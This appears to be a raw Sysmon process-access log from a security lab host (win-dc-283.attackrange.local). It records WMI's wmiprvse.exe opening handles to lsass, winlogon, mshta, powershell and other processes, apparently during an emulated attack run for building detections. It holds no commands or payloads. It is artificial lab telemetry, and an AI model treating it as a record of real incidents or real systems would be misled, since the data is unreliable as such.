15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024728Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024727Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024726Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024725Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024724Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024723Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 